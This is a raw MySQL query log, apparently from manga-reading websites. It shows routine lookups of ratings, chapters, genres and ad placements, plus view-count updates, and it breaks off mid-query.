(sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330653311 Quit 330653312 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653312 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330653312 Quit 330653313 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653313 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330653313 Quit 330653314 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653314 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330653314 Quit 330653315 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653315 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330653315 Quit 330653316 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653316 Query select * FROM chapters where manga_id = '387' order by created desc limit 1 330653316 Quit 330653317 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653317 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330653317 Quit 330653318 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653318 Query select * FROM chapters where manga_id = '272' order by created desc limit 1 330653318 Quit 330653319 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653319 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330653319 Quit 330653320 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653320 Query select * FROM chapters where manga_id = '361' order by created desc limit 1 330653320 Quit 330653321 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653321 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330653321 Quit 330653322 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653322 Query select * FROM chapters where manga_id = '57' order by created desc limit 1 330653322 Quit 330653323 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653323 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330653323 Quit 330653324 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653324 Query select * FROM chapters where manga_id = '285' order by created desc limit 1 330653324 Quit 330653325 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653325 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330653325 Quit 330653326 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653326 Query select * FROM chapters where manga_id = '104' order by created desc limit 1 330653326 Quit 330653327 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653327 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330653327 Quit 330653328 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653328 Query select * FROM chapters where manga_id = '290' order by created desc limit 1 330653328 Quit 330653329 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653329 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330653329 Quit 330653330 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653330 Query select * FROM chapters where manga_id = '40' order by created desc limit 1 330653331 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330653332 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330653332 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '4931' and m.active = 1 330653331 Quit 330653332 Quit 330653333 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330653333 Query select * FROM chapters where id = '4931' 330653333 Quit 330653334 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330653334 Query select * FROM chapters where manga_id = '141' order by display_priority ASC, id desc 330653330 Quit 330653335 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653335 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330653335 Quit 330653336 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653336 Query select * FROM chapters where manga_id = '386' order by created desc limit 1 330653334 Quit 330653337 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330653337 Query Update chapters set view=view+1 where id = '4931' 330653337 Quit 330653338 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330653338 Query select * FROM chapters where id = '4931' 330653338 Quit 330653339 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330653339 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '4931' and m.active = 1 330653339 Quit 330653340 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330653340 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('141', '4931', '51.222.168.198', 'mangaberri.com', '2026-02-26 03:29:28', '2026-02-26 03:29:28') 330653340 Quit 330653341 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330653341 Query select * FROM chapter_images where chapter_id = '4931' 330653341 Quit 330653342 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330653342 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '141' and m.active = 1 330653336 Quit 330653343 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653343 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330653343 Quit 330653344 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653344 Query select * FROM chapters where manga_id = '385' order by created desc limit 1 330653342 Quit 330653345 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330653345 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='141' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Fantasy%' OR genres like '%Martial Arts%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330653345 Quit 330653346 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330653347 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330653346 Quit 330653347 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330653347 Quit 330653344 Quit 330653348 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653348 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330653348 Quit 330653349 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653349 Query select * FROM chapters where manga_id = '384' order by created desc limit 1 330653350 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330653351 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330653350 Quit 330653351 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330653351 Quit 330653352 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330653353 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330653352 Quit 330653353 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330653353 Quit 330653354 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330653355 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330653354 Quit 330653355 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330653355 Quit 330653349 Quit 330653356 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653356 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330653356 Quit 330653357 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653357 Query select * FROM chapters where manga_id = '382' order by created desc limit 1 330653357 Quit 330653358 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653358 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330653358 Quit 330653359 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653359 Query select * FROM chapters where manga_id = '80' order by created desc limit 1 330653359 Quit 330653360 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653360 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330653360 Quit 330653361 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653361 Query select * FROM chapters where manga_id = '377' order by created desc limit 1 260225 19:29:29 330653361 Quit 330653362 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653362 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330653362 Quit 330653363 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653363 Query select * FROM chapters where manga_id = '390' order by created desc limit 1 330653363 Quit 330653364 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653364 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330653364 Quit 330653365 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653365 Query select * FROM chapters where manga_id = '327' order by created desc limit 1 330653365 Quit 330653366 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653366 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330653366 Quit 330653367 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653367 Query select * FROM chapters where manga_id = '376' order by created desc limit 1 330653367 Quit 330653368 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653368 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330653368 Quit 330653369 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653369 Query select * FROM chapters where manga_id = '373' order by created desc limit 1 330653369 Quit 330653370 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653370 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330653370 Quit 330653371 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653371 Query select * FROM chapters where manga_id = '388' order by created desc limit 1 330653371 Quit 330653372 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653372 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330653372 Quit 330653373 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653373 Query select * FROM chapters where manga_id = '173' order by created desc limit 1 330653373 Quit 330653374 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653374 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330653374 Quit 330653375 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653375 Query select * FROM chapters where manga_id = '35' order by created desc limit 1 330653375 Quit 330653376 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653376 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330653376 Quit 330653377 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653377 Query select * FROM chapters where manga_id = '296' order by created desc limit 1 330653377 Quit 330653378 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653378 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330653378 Quit 330653379 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653379 Query select * FROM chapters where manga_id = '22' order by created desc limit 1 330653379 Quit 330653380 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653380 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330653380 Quit 330653381 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653381 Query select * FROM chapters where manga_id = '83' order by created desc limit 1 330653381 Quit 330653382 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653382 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330653382 Quit 330653383 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653383 Query select * FROM chapters where manga_id = '346' order by created desc limit 1 330653383 Quit 330653384 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653384 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330653384 Quit 330653385 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653385 Query select * FROM chapters where manga_id = '240' order by created desc limit 1 330653385 Quit 330653386 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653386 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330653386 Quit 330653387 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653387 Query select * FROM chapters where manga_id = '50' order by created desc limit 1 330653387 Quit 330653388 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653388 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330653388 Quit 330653389 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653389 Query select * FROM chapters where manga_id = '27' order by created desc limit 1 330653389 Quit 330653390 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653390 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330653390 Quit 330653391 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653391 Query select * FROM chapters where manga_id = '92' order by created desc limit 1 330653391 Quit 330653392 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653392 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330653392 Quit 330653393 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653393 Query select * FROM chapters where manga_id = '289' order by created desc limit 1 330653393 Quit 330653394 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653394 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330653394 Quit 330653395 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653395 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330653395 Quit 330653396 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653396 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330653396 Quit 330653397 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653397 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330653397 Quit 330653398 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653398 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330653398 Quit 330653399 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653399 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330653399 Quit 330653400 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653400 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330653400 Quit 330653401 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653401 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330653401 Quit 330653402 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653402 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330653402 Quit 330653403 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653403 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330653403 Quit 330653404 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653404 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330653404 Quit 330653405 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653405 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330653405 Quit 330653406 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653406 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330653406 Quit 330653407 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653407 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330653407 Quit 330653408 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653408 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330653408 Quit 330653409 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653409 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330653409 Quit 330653410 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653410 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330653410 Quit 330653411 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653411 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330653411 Quit 330653412 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653412 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330653412 Quit 330653413 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653413 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330653413 Quit 330653414 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653414 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330653414 Quit 330653415 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653415 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330653415 Quit 330653416 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653416 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330653416 Quit 330653417 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653417 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330653417 Quit 330653418 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653418 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330653418 Quit 330653419 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653419 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330653419 Quit 330653420 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653420 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330653420 Quit 330653421 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653421 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330653421 Quit 330653422 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653422 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330653422 Quit 330653423 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653423 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330653423 Quit 330653424 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653424 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330653424 Quit 330653425 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653425 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330653425 Quit 330653426 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653426 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330653426 Quit 330653427 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653427 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330653427 Quit 330653428 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653428 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330653428 Quit 330653429 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653429 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330653429 Quit 330653430 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653430 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330653430 Quit 330653431 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653431 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330653431 Quit 330653432 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653432 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330653432 Quit 330653433 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653433 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330653433 Quit 330653434 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653434 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330653434 Quit 330653435 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653435 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330653435 Quit 330653436 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653436 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330653436 Quit 330653437 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653437 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330653437 Quit 330653438 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653438 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330653438 Quit 330653439 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653439 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330653439 Quit 330653440 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653440 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330653440 Quit 330653441 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653441 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330653441 Quit 330653442 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653442 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330653442 Quit 330653443 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653443 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330653443 Quit 330653444 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653444 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330653444 Quit 330653445 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653445 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330653445 Quit 330653446 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653446 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330653446 Quit 330653447 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653447 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330653447 Quit 330653448 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653448 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330653448 Quit 330653449 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653449 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330653449 Quit 330653450 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653450 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330653450 Quit 330653451 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653451 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330653451 Quit 330653452 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653452 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330653452 Quit 330653453 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653453 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330653453 Quit 330653454 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653454 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330653454 Quit 330653455 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653455 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330653455 Quit 330653456 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653456 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330653456 Quit 330653457 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653457 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330653457 Quit 330653458 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653458 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330653458 Quit 330653459 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653459 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330653459 Quit 330653460 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653460 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330653460 Quit 330653461 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653461 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330653461 Quit 330653462 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653462 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330653462 Quit 330653463 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653463 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330653463 Quit 330653464 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653464 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330653464 Quit 330653465 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653465 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330653465 Quit 330653466 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653466 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330653466 Quit 330653467 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653467 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330653467 Quit 330653468 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653468 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330653468 Quit 330653469 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653469 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330653469 Quit 330653470 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653470 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330653470 Quit 330653471 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653471 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings 